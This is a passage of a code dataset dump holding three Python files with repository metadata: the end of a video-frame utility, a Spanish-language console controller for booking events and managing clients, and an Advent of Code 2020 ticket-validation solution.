self.images[frame_num]\n try:\n frame = cv2.imread(self.path + \"/\" + image_path)\n except Exception as e:\n babylogger.error(\"{}\".format(e))\n frame = None\n\n try:\n frame = (\n cv2.rotate(frame, cv2.ROTATE_90_COUNTERCLOCKWISE)\n if self.rotate\n else frame\n )\n frame = cv2.resize(frame, self.scaled_dim, interpolation=cv2.INTER_AREA)\n except cv2.error as e:\n babylogger.error(\"Invalid frame!\")\n frame = None\n pass\n\n self.frame = frame\n\n def check_frames(self, max_frames=300):\n if self.frame_count > max_frames:\n return False\n return True\n\n def get_frames(self):\n for i in tqdm(range(self.frame_count)):\n self.get_frame(i)\n yield self.frame\n", "repo_name": "thebabylonai/babylog", "sub_path": "python/src/babylog/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 7247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 156, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imdecode", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.byte", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_ANYCOLOR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 23, "usage_type": "attribute"}, {"api_name": "babylog.protobuf.Image", "line_number": 25, "usage_type": "call"}, {"api_name": "babylog.protobuf.Image.DESCRIPTOR.fields_by_name.keys", "line_number": 28, "usage_type": "call"}, {"api_name": "babylog.protobuf.Image.DESCRIPTOR", "line_number": 28, "usage_type": "attribute"}, {"api_name": "babylog.protobuf.Image", "line_number": 28, "usage_type": "name"}, {"api_name": "babylog.protobuf.Image", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 36, "usage_type": "name"}, {"api_name": "babylog.protobuf.ClassificationResult", "line_number": 45, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 
36, "usage_type": "name"}, {"api_name": "babylog.protobuf.ClassificationResult", "line_number": 36, "usage_type": "name"}, {"api_name": "babylog.data_utils.BoundingBoxDict", "line_number": 50, "usage_type": "name"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__.keys", "line_number": 52, "usage_type": "call"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__", "line_number": 52, "usage_type": "attribute"}, {"api_name": "babylog.data_utils.BoundingBoxDict", "line_number": 52, "usage_type": "name"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__.items", "line_number": 57, "usage_type": "call"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__", "line_number": 57, "usage_type": "attribute"}, {"api_name": "babylog.data_utils.BoundingBoxDict", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 63, "usage_type": "name"}, {"api_name": "babylog.data_utils.BoundingBoxDict", "line_number": 63, "usage_type": "name"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__.keys", "line_number": 68, "usage_type": "call"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__", "line_number": 68, "usage_type": "attribute"}, {"api_name": "babylog.data_utils.BoundingBoxDict", "line_number": 68, "usage_type": "name"}, {"api_name": "babylog.protobuf.BoundingBox", "line_number": 72, "usage_type": "call"}, {"api_name": "babylog.protobuf.BoundingBox", "line_number": 63, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "babylog.logger.babylogger.info", "line_number": 124, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger", "line_number": 124, "usage_type": "name"}, {"api_name": "cv2.VideoCapture", "line_number": 136, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger.info", "line_number": 146, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger", "line_number": 146, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 163, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 164, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_COUNT", "line_number": 167, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 176, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 179, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_POS_FRAMES", "line_number": 187, "usage_type": "attribute"}, {"api_name": "babylog.logger.babylogger.info", "line_number": 191, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger", "line_number": 191, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 198, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger.error", "line_number": 200, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger", "line_number": 200, "usage_type": "name"}, {"api_name": "cv2.rotate", 
"line_number": 205, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_COUNTERCLOCKWISE", "line_number": 205, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 209, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 209, "usage_type": "attribute"}, {"api_name": "cv2.error", "line_number": 210, "usage_type": "attribute"}, {"api_name": "babylog.logger.babylogger.error", "line_number": 211, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger", "line_number": 211, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 223, "usage_type": "call"}]} +{"seq_id": "30386107154", "text": "import os\nimport sys\nfrom datetime import date, datetime, timedelta\nfrom Views.VistaPrincipal import VistaPrincipal\nfrom Views.VistaCliente import VistaCliente\nfrom Views.VistaServicio import VistaServicio\nfrom Views.VistaEvento import VistaEvento\nfrom Models.Servicio import Servicio\nfrom Models.Evento import Evento\nfrom Models.Cliente import Cliente\n\nclass ControllerPrincipal:\n def __init__(self):\n self.servicio = Servicio(nombre='', costo='')\n self.evento = Evento(fecha=\"\", cliente=\"\", servicio=\"\", senia=\"\", costo=\"\", estado=\"\")\n self.cliente = Cliente(nombre=\"\", apellido=\"\", dni=\"\", direccion=\"\", telefono=\"\")\n self.vistaCliente = VistaCliente()\n self.vistaPrincipal = VistaPrincipal()\n self.vistaServicio = VistaServicio()\n self.vistaEvento = VistaEvento()\n self.listaServicio = []\n self.listaEvento = []\n self.listaServiciosTemporales = []\n self.ingresoFecha=0\n self.ingresoSenia = 0\n \n \n def reset_variables(self):\n self.servicio = Servicio(nombre='', costo='')\n self.evento = Evento(fecha=\"\", cliente=\"\", servicio=\"\", senia=\"\", costo=\"\", estado=\"\")\n self.cliente = Cliente(nombre=\"\", apellido=\"\", dni=\"\", direccion=\"\", telefono=\"\")\n self.vistaCliente = VistaCliente()\n self.vistaPrincipal = VistaPrincipal()\n self.vistaServicio = VistaServicio()\n self.vistaEvento = VistaEvento()\n self.listaServicio = []\n self.listaEvento = []\n self.listaServiciosTemporales = []\n self.ingresoFecha=0\n self.ingresoSenia = 0\n \n \n def menu_principal(self):\n self.limpiar_consola()\n self.iniciar_servicio()\n self.iniciar_evento()\n self.vistaPrincipal.menu_presentacion()\n self.vistaPrincipal.menu_opciones()\n ingreso = 1\n while ingreso >= 1 and ingreso <= 6:\n ingreso = self.vistaPrincipal.ingreso_menu()\n if ingreso == '0':\n ingreso = 0\n self.limpiar_consola()\n self.vistaPrincipal.saludo_final()\n sys.exit()\n elif ingreso == '1':\n ingreso = 1\n self.mostrar_servicios()\n self.menu_principal()\n elif ingreso == '2':\n ingreso = 2\n self.limpiar_consola()\n self.listaServicio = self.servicios_para_elegir()\n self.menu_principal()\n elif ingreso == '3':\n ingreso = 3\n self.limpiar_consola()\n self.modificar_servicios_seleccionados() \n elif ingreso == '4':\n ingreso = 4\n self.limpiar_consola()\n self.consultar_disponibilidad()\n self.menu_principal()\n elif ingreso == '5':\n ingreso = 5\n self.limpiar_consola()\n costo = self.calcular_costo()\n self.mostrar_costo(costo,self.evento.get_costo())\n self.menu_principal() \n elif ingreso == '6':\n ingreso = 6\n self.limpiar_consola()\n self.carga_nombre()\n self.carga_apellido()\n self.carga_dni()\n self.carga_direccion()\n self.carga_telefono()\n self.carga_senia()\n self.menu_principal() \n elif ingreso == '7':\n ingreso = 7 \n self.limpiar_consola()\n self.cancelar_evento()\n self.menu_principal() \n elif ingreso == '8':\n ingreso = 8 \n 
self.limpiar_consola()\n self.verificar_reserva()\n #self.menu_principal() \n else:\n self.vistaPrincipal.error_ingreso()\n ingreso = 1\n \n \n def iniciar_servicio(self):\n try:\n self.listaServicio = []\n with open(\"servicios.txt\", 'r') as file:\n file.seek(0)\n archivo = file.readlines()\n for line in archivo:\n item = line.strip().split(';')\n self.servicio = Servicio(item[0], item[1])\n self.listaServicio.append(self.servicio) \n return self.servicio \n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\")\n \n \n def iniciar_evento(self):\n try:\n with open(\"eventos.txt\", 'r') as file:\n file.seek(0)\n archivo = file.readlines()\n for line in archivo:\n item = line.strip().split(';')\n self.evento = Evento(item[0], item[1], item[2], item[3], item[4], item[5])\n self.listaEvento.append(self.evento) \n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\") \n \n \n \n def total_lineas_archivo(self):\n try:\n with open(\"servicios.txt\", 'r') as file:\n lineas = file.readlines()\n return len(lineas)\n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\")\n \n \n \n def servicios_elegidos(self, estado):\n try:\n with open(\"servicios.txt\", 'r') as file:\n archivo = file.readlines()\n cont = 0\n for index, line in enumerate(archivo):\n linea = line.strip().split(';')\n for index2, servicio in enumerate(self.listaServiciosTemporales):\n if int(servicio) == (index+1):\n if estado == 1:\n self.vistaServicio.servicios_elegidos(linea[0])\n else:\n cont += 1\n self.vistaServicio.servicios_para_eliminar(cont, linea[0])\n break\n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\")\n \n \n def servicios_para_elegir(self):\n self.vistaServicio.titulo_menu()\n for index, servicio in enumerate(self.listaServicio):\n print(servicio.__str__(index+1))\n ingreso = 1\n total = self.total_lineas_archivo()\n if len(self.listaServiciosTemporales) > 0:\n self.vistaServicio.titulo_servicios_elegidos()\n self.servicios_elegidos(1) \n while ingreso >= 1 and ingreso <= total:\n ingreso = self.vistaServicio.ingreso_menu()\n if ingreso.isdigit():\n if ingreso != '0':\n ingreso = int(ingreso)\n if ingreso >= 1 and ingreso <= total:\n if ingreso not in self.listaServiciosTemporales :\n self.listaServiciosTemporales.append(ingreso) \n else:\n self.vistaServicio.error_valor_duplicado() \n ingresoSeguimiento = 'x'\n while ingresoSeguimiento != 'no' and ingresoSeguimiento != 'si':\n ingresoSeguimiento = self.vistaServicio.consulta_seguimiento() \n if ingresoSeguimiento.lower() == 'si':\n ingreso = 1\n self.limpiar_consola()\n self.servicios_para_elegir()\n elif ingresoSeguimiento.lower() == 'no': \n self.menu_principal()\n else:\n self.vistaServicio.error_ingreso()\n ingresoSeguimiento = 'x'\n ingreso = 1\n else:\n self.vistaServicio.error_ingreso()\n ingreso = 1\n else:\n self.menu_principal()\n else:\n self.vistaServicio.error_ingreso()\n ingreso = 1\n \n \n def limpiar_consola(self):\n os.system('cls') \n #os.system('clear')\n \n \n def mostrar_servicios(self):\n self.limpiar_consola()\n self.vistaServicio.titulo_menu()\n for index, servicio in enumerate(self.listaServicio):\n print(servicio.__str__(index+1))\n ingreso = 0\n while ingreso != 1: \n ingreso = self.vistaServicio.vista_atras()\n if ingreso.isdigit():\n ingreso = int(ingreso)\n if ingreso == 1:\n return \n else:\n self.vistaServicio.error_ingreso()\n ingreso = 0\n else:\n self.vistaServicio.error_ingreso()\n ingreso = 0\n \n \n \n def modificar_servicios_seleccionados(self):\n 
self.limpiar_consola()\n if self.listaServiciosTemporales == []:\n self.vistaServicio.seleccion_vacia()\n self.menu_principal()\n else:\n self.vistaServicio.titulo_servicios_elegidos()\n self.servicios_elegidos(2) \n estado = True\n while estado:\n ingreso = self.vistaServicio.seleccion_eliminar_servicios()\n if ingreso.isdigit():\n if ingreso == '0':\n self.menu_principal() \n else:\n if int(ingreso) > 0 and int(ingreso) <= len(self.listaServiciosTemporales): \n for index, servicio in enumerate(self.listaServiciosTemporales):\n if int(ingreso) == (index+1):\n self.listaServiciosTemporales.pop(index)\n break\n self.modificar_servicios_seleccionados()\n else:\n self.vistaServicio.error_ingreso() \n else:\n self.vistaServicio.error_ingreso()\n \n \n \n def calcular_costo(self): \n costo = 0\n for index, item in enumerate(self.listaServicio):\n for index2, servicio in enumerate(self.listaServiciosTemporales):\n if (index+1) == int(servicio):\n costo += int(item.get_costo())\n break \n total = (costo + 10000) * 1.21\n self.evento.set_costo(total)\n return costo\n \n \n \n def mostrar_costo(self, costo, total):\n self.vistaServicio.mostrar_costo(costo, '10000', total)\n ingreso = 0\n while ingreso == 0:\n ingreso = self.vistaServicio.vista_atras()\n if ingreso.isdigit():\n ingreso = int(ingreso)\n if ingreso == 1:\n return \n else:\n self.vistaServicio.error_ingreso()\n ingreso = 0\n else:\n self.vistaServicio.error_ingreso()\n ingreso = 0\n \n \n \n def consultar_disponibilidad(self):\n if self.ingresoFecha == 0: \n ingreso = 1\n while str(ingreso).isdigit():\n ingreso = self.vistaEvento.ingreso_fecha()\n if ingreso.isdigit():\n if int(ingreso) >= 1 and int(ingreso) <= 31:\n for index, evento in enumerate(self.listaEvento):\n if (index+1) == int(ingreso):\n estado = evento.get_estado()\n if estado == '1':\n self.vistaEvento.evento_ocupado()\n for indexLibre, eventoLibre in enumerate(self.listaEvento):\n if indexLibre > index :\n estadoLibre = eventoLibre.get_estado()\n if estadoLibre == '0':\n ingresoLibre = 'x'\n while ingresoLibre != 'si' and ingresoLibre != 'no':\n if (indexLibre+1) < len(self.listaEvento):\n ingresoLibre = self.vistaEvento.fecha_libre_proxima(eventoLibre.get_fecha())\n if ingresoLibre.lower() == 'si':\n fecha = indexLibre+1\n self.ingresoFecha = fecha\n self.menu_principal()\n elif ingresoLibre.lower() == 'no':\n break\n elif ingresoLibre == '1':\n self.menu_principal()\n else:\n self.vistaEvento.error_ingreso()\n ingresoLibre = 'x'\n else:\n ingresoLibre = self.vistaEvento.ultima_fecha_libre(eventoLibre.get_fecha())\n if ingresoLibre.lower() == 'si':\n fecha = indexLibre+1\n self.ingresoFecha = fecha \n self.menu_principal()\n elif ingresoLibre.lower() == 'no':\n self.menu_principal()\n elif ingresoLibre == '1':\n self.menu_principal()\n else:\n self.vistaEvento.error_ingreso()\n ingresoLibre = 'x'\n else:\n fecha = index+1\n self.ingresoFecha = fecha \n ingresoReserva = 'x'\n while ingresoReserva != '1':\n ingresoReserva = self.vistaEvento.evento_guardado()\n if ingresoReserva == '1':\n self.menu_principal()\n else:\n ingreso = 'x'\n self.vistaEvento.error_ingreso() \n else: \n self.vistaEvento.error_ingreso()\n self.limpiar_consola() \n self.consultar_disponibilidad()\n else:\n self.vistaEvento.error_ingreso() \n self.limpiar_consola() \n self.consultar_disponibilidad()\n else:\n fecha = str(self.ingresoFecha)+\"/07/2023\"\n ingreso = self.vistaEvento.fecha_reservada(fecha)\n if ingreso == '1':\n self.ingresoFecha = 0\n self.limpiar_consola()\n 
self.consultar_disponibilidad()\n else:\n return\n \n \n \n def carga_nombre(self):\n ingreso = 1\n while ingreso == 1:\n nombre = self.vistaCliente.carga_nombre()\n if nombre.isspace() or len(nombre) == 0:\n self.vistaCliente.error_ingreso()\n elif nombre != '1': \n self.cliente.set_nombre(nombre)\n ingreso = 0\n else:\n self.menu_principal()\n \n \n \n def carga_apellido(self):\n ingreso = 1\n while ingreso == 1:\n apellido = self.vistaCliente.carga_apellido()\n if apellido.isspace() or apellido.isdigit() or len(apellido) == 0:\n self.vistaCliente.error_ingreso()\n elif apellido != '1': \n self.cliente.set_apellido(apellido)\n ingreso = 0\n else:\n self.menu_principal()\n \n \n \n def carga_dni(self):\n ingreso = 1\n while ingreso == 1:\n dni = self.vistaCliente.carga_dni()\n if dni.isspace() or len(dni) == 0:\n self.vistaCliente.error_ingreso()\n elif dni != '1': \n estado = self.verifica_dni(dni)\n if estado: \n self.vistaCliente.dni_usado()\n self.menu_principal()\n else:\n self.cliente.set_dni(dni)\n ingreso = 0\n else:\n self.menu_principal() \n \n \n \n def verifica_dni(self, dni):\n estado = False\n for evento in self.listaEvento: \n if evento.get_cliente() == dni:\n estado = True\n return estado\n \n \n \n def carga_telefono(self):\n ingreso = 1\n while ingreso == 1:\n telefono = self.vistaCliente.carga_telefono()\n if telefono.isspace() or len(telefono) == 0:\n self.vistaCliente.error_ingreso()\n elif telefono != '1': \n self.cliente.set_telefono(telefono)\n ingreso = 0\n else:\n self.menu_principal() \n \n \n \n def carga_direccion(self):\n ingreso = 1\n while ingreso == 1:\n direccion = self.vistaCliente.carga_direccion()\n if direccion.isspace() or len(direccion) == 0:\n self.vistaCliente.error_ingreso()\n elif direccion != '1': \n self.cliente.set_direccion(direccion)\n ingreso = 0\n else:\n self.menu_principal() \n \n \n \n def carga_senia(self): \n self.calcular_costo()\n ingreso = 1\n while ingreso == 1:\n reserva = self.vistaEvento.senia_evento(self.evento.calcular_senia(), self.evento.get_costo())\n if reserva.isdigit():\n if int(reserva) != self.evento.calcular_senia() and reserva != '1':\n self.vistaEvento.error_senia()\n elif reserva != '1': \n estado = self.verificar_datos_ingresados()\n if estado:\n self.menu_principal()\n else:\n self.ingresoSenia = reserva\n self.cargar_evento() \n self.cargar_cliente()\n self.vistaEvento.reserva_exito()\n self.reset_variables()\n ingreso = 0\n else:\n self.menu_principal() \n else:\n self.vistaEvento.error_senia()\n \n \n \n def verificar_datos_ingresados(self):\n estado = False\n if self.cliente.get_nombre() == '' or self.cliente.get_apellido() == '' or self.cliente.get_telefono() == '' or self.cliente.get_direccion() == '' or self.cliente.get_dni() == '':\n self.vistaEvento.error_documentacion()\n estado = True\n if self.listaServiciosTemporales == []:\n self.vistaServicio.error_documentacion()\n estado = True\n if self.ingresoFecha == 0:\n self.vistaEvento.error_documentacion()\n estado = True\n return estado\n \n \n \n def cargar_evento(self):\n try:\n with open(\"eventos.txt\", \"r+\") as archivo:\n lineas = archivo.readlines()\n lineas_modificadas = []\n for index, linea in enumerate(lineas):\n if index == (self.ingresoFecha-1):\n if self.ingresoFecha < 10 :\n fecha = \"0\" + str(self.ingresoFecha) + \"/07/2023\"\n else:\n fecha = str(self.ingresoFecha) + \"/07/2023\"\n lineas_modificadas.append(str(fecha)+\";\"+ str(self.cliente.get_dni())+\";\"+ str(self.listaServiciosTemporales)+\";\"+self.ingresoSenia+\";\"+ 
str(self.evento.get_costo())+\";\"+ \"1\\n\")\n                    else:\n                        lineas_modificadas.append(linea)  \n                archivo.seek(0)  \n                archivo.writelines(lineas_modificadas)\n                archivo.truncate()  \n        except Exception as e:\n            print(f\"The following error occurred: {e}\")  \n    \n    \n    \n    def cargar_cliente(self):\n        try:\n            with open(\"clientes.txt\", \"a+\") as archivo:\n                lineas = archivo.readlines()\n                estado = False\n                for linea in lineas:\n                    campos = linea.split(\";\")\n                    if campos[2].strip().split(\".\") == self.cliente.get_dni().strip().split(\".\"):\n                        estado = True\n                if estado == False:\n                    nueva_linea = f\"{self.cliente.get_nombre()};{self.cliente.get_apellido()};{self.cliente.get_dni()};{self.cliente.get_direccion()};{self.cliente.get_telefono()}\\n\"\n                    archivo.write(nueva_linea)  \n        except Exception as e:\n            print(f\"The following error occurred: {e}\")  \n    \n    \n    \n    def cancelar_evento(self):\n        self.limpiar_consola()\n        dni = self.vistaCliente.carga_dni()\n        estado = False\n        if dni != '1':\n            for evento in self.listaEvento:\n                if evento.get_cliente() == dni:\n                    estado = True\n                    estadoVerificacion = self.verificar_cancelacion(evento.get_fecha())\n                    if estadoVerificacion:  \n                        self.vistaEvento.fecha_evento(evento.get_fecha())\n                        valueCancel = 'x'\n                        while valueCancel == 'x':\n                            estadoCancelacion = self.vistaEvento.cancelacion_evento()\n                            if estadoCancelacion.lower() == 'si':  \n                                self.calcular_costo()  \n                                monto = self.calcular_devolucio(evento.get_cliente())\n                                self.vistaEvento.devolucion_reserva(str(monto), evento.get_senia())\n                                self.vistaEvento.confirmacion_cancelacion()\n                                self.eliminar_evento(evento.get_fecha())\n                                self.reset_variables()\n                                valueCancel = 'ok'\n                                return  \n                            elif estadoCancelacion.lower() == 'no':\n                                return\n                            else:\n                                valueCancel = 'x'\n                                self.vistaEvento.error_ingreso()\n                    else:  \n                        self.vistaEvento.cancelacion_fuera_fecha(evento.get_fecha())\n                        estadoCancelacion = self.vistaEvento.cancelacion_evento()\n                        if estadoCancelacion.lower() == 'si':  \n                            self.eliminar_evento(evento.get_fecha())\n                            self.reset_variables()\n                            valueCancel = 'ok'\n                            return  \n                        elif estadoCancelacion.lower() == 'no':\n                            return\n                        else:\n                            valueCancel = 'x'\n                            self.vistaEvento.error_ingreso()  \n            self.cancelar_evento()  \n            \n            if estado == False:\n                ingreso = self.vistaEvento.error_buscar_dni()\n                if ingreso == '1':\n                    self.limpiar_consola()\n                    self.cancelar_evento()\n                else:\n                    self.menu_principal()  \n        else:\n            self.menu_principal()\n    \n    \n    \n    def calcular_devolucio(self, dni):\n        for evento in self.listaEvento:  \n            if dni in evento.get_cliente():\n                return float(evento.get_senia())*0.20  \n\n    \n    \n    def verificar_cancelacion(self, fecha):\n        try:  \n            fechaActual = date.today()\n            fechaEvento = datetime.strptime(fecha, \"%d/%m/%Y\").date()\n            diferencia = abs((fechaActual - fechaEvento).days)\n            fechaActual_str = fechaActual.strftime(\"%d/%m/%Y\")\n            fechaEvento_str = fechaEvento.strftime(\"%d/%m/%Y\")\n            if diferencia >= 15:\n                return True\n            else:  \n                return False\n        except Exception as e:\n            print(f\"The following error occurred: {e}\")  \n\n\n\n    def eliminar_evento(self, fecha):  \n        try:\n            with open(\"eventos.txt\", \"r+\") as archivo:\n                lineas = archivo.readlines()\n                lineas_modificadas = []\n                for index, linea in enumerate(lineas):\n                    campos = linea.strip().split(\";\")\n                    fechaRegistrada = campos[0]\n                    if fechaRegistrada == fecha:  \n                        if index < 9 :\n                            fecha = \"0\" + str(index + 1) + \"/07/2023\"\n                        else:\n                            fecha = str(index + 1) + \"/07/2023\"\n                        lineas_modificadas.append(str(fecha)+\";\"+\"0\"+\";\"+\"0\"+\";\"+\"0\"+\";\"+\"0\"+\";\"+\"0\\n\")\n                    else:\n                        lineas_modificadas.append(linea)  \n                
archivo.seek(0)  \n                archivo.writelines(lineas_modificadas)\n                archivo.truncate()  \n        except Exception as e:\n            print(f\"The following error occurred: {e}\")  \n\n\n\n    def verificar_reserva(self):  \n        self.limpiar_consola()\n        estado = True\n        while estado:  \n            dni = self.vistaCliente.carga_dni()\n            if dni == \"1\":\n                self.menu_principal()\n            elif dni.isdigit():\n                estadoDni = True\n                for evento in self.listaEvento:\n                    if dni == evento.get_cliente():\n                        estadoDni = False\n                        self.vistaCliente.evento_reservado(evento.get_fecha())\n                        cont = 0\n                        for index, servicio in enumerate(self.listaServicio):\n                            for i in evento.get_servicio():\n                                if str(index+1) == i:\n                                    cont += 1\n                                    self.vistaServicio.servicios_para_eliminar(cont, servicio.get_nombre())\n                                    break\n                if estadoDni:\n                    estado3 = True\n                    while estado3:  \n                        ingreso2 = self.vistaCliente.error_sin_evento()\n                        if ingreso2 == \"1\":\n                            self.verificar_reserva()\n                        elif ingreso2 == \"0\":\n                            self.menu_principal()\n                        else:\n                            self.vistaEvento.error_ingreso()\n                estado2 = True  \n                while estado2:\n                    ingreso = self.vistaCliente.vista_atras()\n                    if ingreso == \"1\":\n                        self.menu_principal()\n                    else:\n                        self.vistaCliente.error_ingreso()\n            else:\n                self.vistaCliente.error_ingreso()", "repo_name": "EmmaCanelo/TrabajoIntegradorConjunto", "sub_path": "Controllers/ControllerPrincipal.py", "file_name": "ControllerPrincipal.py", "file_ext": "py", "file_size_in_byte": 29041, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Models.Servicio.Servicio", "line_number": 14, "usage_type": "call"}, {"api_name": "Models.Evento.Evento", "line_number": 15, "usage_type": "call"}, {"api_name": "Models.Cliente.Cliente", "line_number": 16, "usage_type": "call"}, {"api_name": "Views.VistaCliente.VistaCliente", "line_number": 17, "usage_type": "call"}, {"api_name": "Views.VistaPrincipal.VistaPrincipal", "line_number": 18, "usage_type": "call"}, {"api_name": "Views.VistaServicio.VistaServicio", "line_number": 19, "usage_type": "call"}, {"api_name": "Views.VistaEvento.VistaEvento", "line_number": 20, "usage_type": "call"}, {"api_name": "Models.Servicio.Servicio", "line_number": 29, "usage_type": "call"}, {"api_name": "Models.Evento.Evento", "line_number": 30, "usage_type": "call"}, {"api_name": "Models.Cliente.Cliente", "line_number": 31, "usage_type": "call"}, {"api_name": "Views.VistaCliente.VistaCliente", "line_number": 32, "usage_type": "call"}, {"api_name": "Views.VistaPrincipal.VistaPrincipal", "line_number": 33, "usage_type": "call"}, {"api_name": "Views.VistaServicio.VistaServicio", "line_number": 34, "usage_type": "call"}, {"api_name": "Views.VistaEvento.VistaEvento", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}, {"api_name": "Models.Servicio.Servicio", "line_number": 114, "usage_type": "call"}, {"api_name": "Models.Evento.Evento", "line_number": 128, "usage_type": "call"}, {"api_name": "os.system", "line_number": 207, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 594, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 594, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 595, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 595, "usage_type": "name"}]}
+{"seq_id": "36628580274", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 16 07:32:33 2020\n\n@author: Nino\n\"\"\"\n\nimport re\nimport numpy as np\nfrom collections import defaultdict\nfrom time import 
time\n\n\n# =============================================================================\n# FUNCTIONS\n# =============================================================================\n\ndef load_input(fname):\n with open(fname, 'r') as f:\n data = f.read().split('\\n\\n')\n return data\n\n\ndef parse_input(fields, my_ticket, nearby_tickets):\n # get fields, and valid ranges\n valid_fields = {}\n for field in fields.split('\\n'):\n field_name, value_ranges = field.split(': ')\n value_ranges = list(map(int, re.findall(r'\\d+', value_ranges)))\n set_of_values1 = set(range(value_ranges[0], value_ranges[1]+1))\n set_of_values2 = set(range(value_ranges[2], value_ranges[3]+1))\n valid_fields[field_name] = set_of_values1 | set_of_values2\n\n # get my ticket values\n _, list_of_strings = my_ticket.split('\\n')\n my_ticket_numbers = list(map(int, list_of_strings.split(',')))\n\n # get nearby tickets\n ticket_numbers = []\n for ticket in nearby_tickets.split('\\n'):\n extracted_tickets = list(map(int, re.findall(r'\\d+', ticket)))\n if extracted_tickets: ticket_numbers.append(extracted_tickets)\n \n return valid_fields, my_ticket_numbers, ticket_numbers\n\n\ndef find_valid_tickets(ticket_fields, nearby_tickets):\n all_valid_field_values = set.union(*ticket_fields.values())\n valid_tickets = []\n invalid_sum = 0\n for ticket in nearby_tickets:\n not_posibru = list(set(ticket).difference(all_valid_field_values))\n if not_posibru: invalid_sum += sum(not_posibru)\n else: valid_tickets.append(ticket)\n return valid_tickets, invalid_sum\n\n\ndef connect_values_with_ticket_fields(ticket_fields, valid_tickets):\n # numpy, yay! I can just transpose the matrix\n valid_tickets = np.array(valid_tickets)\n\n # find which number indices are valid for each field\n valid_idx = defaultdict(set)\n for idx, list_of_numbers in enumerate(valid_tickets.T):\n set_of_numbers = set(list_of_numbers)\n for field, valid_range in ticket_fields.items():\n if set_of_numbers.issubset(valid_range):\n valid_idx[field].add(idx)\n\n # find which field value corresponds to which index\n sorted_valid_idx = sorted(valid_idx.items(), key=lambda x: x[1])\n not_it = set()\n for field, idx in sorted_valid_idx:\n valid_idx[field] = valid_idx[field].difference(not_it)\n not_it.update(idx)\n \n return valid_idx\n\n\ndef define_my_ticket(valid_idx):\n my_prod = 1 \n for field, idx in valid_idx.items():\n if field[:6] == 'depart':\n my_prod *= my_ticket[list(idx)[0]]\n return my_prod\n\n\n# =============================================================================\n# MAIN\n# =============================================================================\n\nmsStart = time()\ndata = load_input('input.txt')\nticket_fields, my_ticket, nearby_tickets = parse_input(*data)\nvalid_tickets, invalid_sum = find_valid_tickets(ticket_fields, nearby_tickets)\nvalid_idx = connect_values_with_ticket_fields(ticket_fields, valid_tickets)\nmy_prod = define_my_ticket(valid_idx)\n\nprint(f'Solution to part 1: {invalid_sum}')\nprint(f'Solution to part 2: {my_prod}')\nprint(f'Run time: {time() - msStart:.3f} s')\n", "repo_name": "NKrvavica/Advent-of-Code-2020", "sub_path": "Day16/day16.py", "file_name": "day16.py", "file_ext": "py", "file_size_in_byte": 3407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.findall", "line_number": 29, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, 
